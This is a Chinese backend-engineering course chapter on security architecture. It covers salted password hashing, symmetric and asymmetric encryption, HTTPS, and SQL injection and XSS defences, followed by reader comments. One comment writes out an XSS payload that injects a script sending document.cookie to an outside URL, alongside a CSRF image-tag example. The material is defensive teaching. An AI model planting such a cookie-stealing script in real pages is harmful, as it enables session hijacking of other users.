30 | 安全性架构:为什么说用户密码泄漏是程序员的锅?
下载APP
关闭
渠道合作
推荐作者
30 | 安全性架构:为什么说用户密码泄漏是程序员的锅?
2020-01-31 李智慧 来自北京
《后端技术面试 38 讲》
课程介绍
讲述:李智慧
时长09:43大小7.79M
系统安全是一个老生常谈又容易被忽视的问题,往往只有在系统被攻击了,数据泄漏了,才会关注软件安全问题。互联网应用因为要向全球用户提供服务,在任何地方都可以访问互联网应用,任何恶意的用户可以在世界任何地方对互联网系统发起攻击,因此互联网系统又具有天然的脆弱性。
在互联网各种安全问题中,最能引发话题,刺激大众神经的就是用户密码泄露。数据库被拖库,导致所有的数据泄露,这种系统安全问题涉及的因素可能有很多,大部分都和开发软件的程序员没有关系。但是因为数据库被拖库,黑客直接获得了用户密码等敏感信息,导致用户密码泄露就是程序员的责任了。
数据加解密
通过对用户密码、身份证号、银行卡号等敏感数据加密,保护数据安全,是软件安全性架构的一部分,是程序员和架构师的责任。
软件开发过程中,主要使用的加密方法有三种:单向散列加密、对称加密和非对称加密。
用户密码加密通常使用的是单向散列加密。所谓的单向散列加密是指对一串明文信息进行散列(hash)加密,得到的密文信息是不可以被解密的,也就是说给定一个密文,即使是加密者也无法知道它的明文是什么的,加密是单向的,不支持解密。
单向散列加密事实上是一种 hash 算法。我们熟悉的 MD5 算法就是一种单向散列加密算法,单向散列算法虽然无法通过对密文进行解密计算,还原得到原始明文。但是,如果知道了算法,就可以通过彩虹表的方法进行破解。彩虹表是常用明文和密文的映射表,很多人喜欢用生日做密码,其实生日的组合是非常有限的,轻易就可以建一个生日和密文的映射表。如果黑客得到了密文,可以通过查表的办法得到密码明文。
因此在实践中,使用单向散列算法加密,还需要在计算过程中加点“盐”salt,如果黑客不知道加的“盐”是什么,就无法建立彩虹表,还原得到明文。
单向散列加密的主要应用场景就是应用到用户密码加密上。加密和密码校验过程如下:
用户在注册的时候需要输入密码,应用服务器得到密码以后,调用单向散列加密算法,对密码进行加密,然后将加密后的密文存储到数据库中去。用户下一次登录的时候,在客户端依然需要输入密码,而用户输入的密码发送到 Web 服务器以后,Web 服务器对输入的密码再进行一次单向散列加密,得到密文,然后和从数据库中取出来的密文进行对比,如果两个密文是相同的,那么用户的登录验证就是成功的。通过这种手段,可以保证用户密码的安全性,即使数据库被黑客拖库,也不会泄漏用户密码。
密码加密的时候也需要加点“盐”,这种场景下,每个用户加密的“盐”都可以不同,比如用用户的 ID 作为盐,这样可以增加破解的难度。
另一种加密手段是对称加密。
对称加密,顾名思义,就是使用一个加密算法和一个密钥,对一段明文进行加密以后得到密文,然后使用相同的密钥和对应的解密算法,对密文进行解密,就可以计算得到明文。对称加密主要用于加密一些敏感信息,对密文进行信息传输和存储,但是在使用的时候,必须要解密得到明文信息的一些场景。
比如说用户的信用卡卡号,很多互联网电商网站支持用户使用信用卡进行支付。但如果直接把信用卡号、有效期、安全码存储在数据库中是比较危险的,所以必须对这些信息进行加密,在数据库中存储密文。但是在使用的时候又必须要对密文进行解密,还原得到明文,才能够正常使用。所以这个时候就要使用对称加密算法,在存储的时候使用加密算法进行加密,在使用的时候使用解密算法进行解密。
还有一种加密被称作非对称加密。所谓的非对称加密是指在加密的时候使用一个加密算法和一个加密密钥进行加密,得到一个密文。在解密的时候,必须使用解密算法和解密密钥进行解密才能够还原得到明文,加密密钥和解密密钥完全不同。通常加密密钥被称作公钥,解密密钥被称作私钥。
非对称加密的典型应用场景,就是我们常见的 HTTPS。用户在客户端进行网络通讯的时候,对数据使用加密密钥即公钥和加密算法进行加密,得到密文。到了数据中心的服务器以后,使用解密密钥即私钥和解密算法进行解密,得到明文。
由于非对称加密需要消耗的计算资源比较多,效率也比较差,HTTPS 并不是每次请求响应都用非对称加密,而是先利用非对称加密,在客户端和服务器之间交换一个对称加密的密钥,然后每次请求响应都用对称加密。这样,用非对称加密保证对称加密密钥的安全,再用对称加密密钥保证请求响应数据的安全。
使用非对称加密,还可以实现数字签名。用数字签名的时候是反过来的,自己用私钥进行加密,得到一个密文,但是其他人可以用公钥将密文解开,因为私钥只有自己才拥有,所以等同于签名。一段经过自己私钥加密后的文本,文本内容就等于是自己签名认证过的。我在后面要讲到的区块链架构中,交易就使用非对称加密进行签名。
HTTP 攻击与防护
互联网应用对外提供服务主要就是通过 HTTP 协议,任何人都可以在任何地方通过 HTTP 协议访问互联网应用,因此 HTTP 攻击是黑客攻击行为中门槛最低的攻击方式,也是最常见的一种互联网攻击。而 HTTP 攻击中,最常见的是 SQL 注入攻击和 XSS 攻击。
SQL 注入攻击就是攻击者在提交的请求参数里面,包含有恶意的 SQL 脚本。如下:
如果在 Web 页面中有个输入框,要求用户输入姓名,普通用户输入一个普通的姓名 Frank,那么最后提交的 HTTP 请求如下:
服务器在处理计算后,向数据库提交的 SQL 查询命令如下:
但是恶意攻击者可能会提交这样的 HTTP 请求:
即输入的 uername 是:
这样,服务器在处理后,最后生成的 SQL 是这样的:
事实上,这是两条 SQL,一条 select 查询 SQL,一条 drop table 删除表 SQL。数据库在执行完查询后,就将 users 表删除了,系统崩溃了。
SQL 注入攻击我在第 6 篇讲到过,最有效的防攻击手段是 SQL 预编译。Java 开发的话最好使用 PrepareStatement 提交 SQL,而 MyBatis 等 ORM 框架主要的 SQL 提交方式就是用 PrepareStatement。
XSS 攻击即跨站点脚本攻击,攻击者构造恶意的浏览器脚本文件,使其在其他用户的浏览器上运行,进而进行攻击。
攻击者发送一个含有恶意脚本的请求给被攻击的服务器,比如通过发布微博的方式向微博的服务器发送恶意请求,被攻击的服务器将恶意脚本存储到本地的数据库中,其他的正常用户通过被攻击的服务器浏览信息的时候,服务器会读取数据库中含有恶意脚本的数据,并向其展现给正常的用户,在正常用户的浏览器上执行,从而达到攻击的目的。
XSS 攻击防御的主要手段是消毒,检查用户提交的请求中是否含有可执行的脚本,因为大部分的攻击请求都包含 JS 等脚本语法,所以可以通过 HTML 转义的方式,对比较有危险的脚本语法关键字进行转义。比如把“>”转义为“>”,HTML 显示的时候还是正常的“>”,但是这样的脚本无法在浏览器上执行,也就无法达到攻击的目的。
由于 HTTP 攻击必须以 HTTP 请求的方式提交到服务器,因此可以在服务器的入口统一进行拦截,对含有危险信息的请求,比如 drop table,JS 脚本等,进行消毒转义,或者直接拒绝请求。即设置一个 Web 应用防火墙,将危险请求隔离。
针对 Web 应用防火墙,我们可以自己开发一个统一的请求过滤器进行拦截,也可以使用 ModSecurity(http://www.modsecurity.org/)这样的开源 WAF(Web Application Firewall)。
小结
硬件指令和操作系统可能会有漏洞,我们使用的各种框架和 SDK 可能也有漏洞,这些漏洞从被发现,到被公开,再到官方修复漏洞,可能会经过一个或长或短的时间,这个时间内就可能被掌握这些漏洞的黑客利用,攻击系统。
这种漏洞在官方修复之前,我们基本没有办法应对。但是黑客攻击也不是无意义的攻击,而是为了各种利益而来,很多时候是针对数据而来,做好数据加密存储与传输,即使是数据泄露了,黑客无法对数据解密,利用数据获利,也可以保护我们的数据资产。
同时加强请求的合法性检查,避免主要的 HTTP 攻击,及时更新生产环境的各种软件版本,修复安全漏洞,提高黑客攻击的难度,使其投入产出不成比例,从而营造一个相对安全的生产环境。
思考题
除了文中提到的 HTTP 攻击方式,还有哪些比较常见的 HTTP 攻击?对应的防护手段有哪些?
欢迎你在评论区写下你的思考,也欢迎把这篇文章分享给你的朋友或者同事,一起交流。
分享给需要的人,Ta购买本课程,你将得18元
生成海报并分享
赞 9
提建议
© 版权归极客邦科技所有,未经许可不得传播售卖。 页面已增加防盗追踪,如有侵权极客邦将依法追究其法律责任。
上一篇
29 | 高可用架构:我们为什么感觉不到淘宝应用升级时的停机?
下一篇
31 | 大数据架构:大数据技术架构的思想和原理是什么?
精选留言(10)
- escray2020-10-14使用用户的 ID 作为盐确实是一个好主意,按照这个思路,也可以用用户创建的日期来作为盐。 常见的 Web 攻击方式,除了 SQL 注入,XSS, Cross Site Script 跨站脚本攻击,还有 CSRF, Cross-Site Request Forgery 跨站请求伪造,而专栏文中的例子其实更像是 CSRF 攻击。 XSS 攻击的例子: 评论内容上半部分 <script> var script =document.createElement('script'); script.src='http://...?cookie=' + document.cookie; document.body.appendChild(script); </script> 评论内容下半部分 CSRF 攻击的例子: 评论内容 1 <img src="/logout"> 评论内容 2 体会一下。 XSS 是劫持了某个身份,而 CSRF 是假冒了某个身份。 例子来源于《全栈工程师修炼指南》专栏里面的《31 | 防人之心不可无:网站安全问题窥视》 Web 攻击(也可以称之为 HTTP 攻击)还要再加上 HTTP 劫持、 DNS 劫持和 DDoS, Distributed Denial-of-Service 攻击。 作为程序员确实需要了解一些安全常识,以免背锅。展开7
- a、2020-02-03crsf(跨站请求伪造)攻击,解决办法是每次请求服务器,服务器都返回一个token,用户端下次请求要带着这个token去请求,服务器校验token是否有效3
- 学习学个屁2020-04-02伪造cookie ,解决办法使用token请求1
- 千米完结2020-04-01感觉还有一种攻击 就是别人盗取了账号密码 但是 登录的时候 需要校验常用地 常用手机 常用浏览器等 然后 短信或者邮箱验证码登录 可以解决1
- test2022-11-06 来自广东XSS, Cross Site Script。CSRF, Cross-Site Request Forgery 、
- test2022-11-06 来自广东XSS 是劫持了某个身份,而 CSRF 是假冒了某个身份。
- ꧁༺༻꧂2022-09-25 来自四川中间人
- LIKE2020-07-05ssrf 攻击,好像又称内网穿透,对其攻击原理不是很理解,老师可以帮忙深入讲一下攻击原理和防护措施吗?
- hex2020-02-14并发提交某请求。解决使用传token检验或者redis锁
- Jinyun2020-02-01DDoS 攻击貌似是